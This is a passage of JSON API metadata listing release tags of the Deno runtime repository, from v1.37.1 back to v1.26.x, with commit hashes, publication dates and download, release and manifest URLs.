Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/h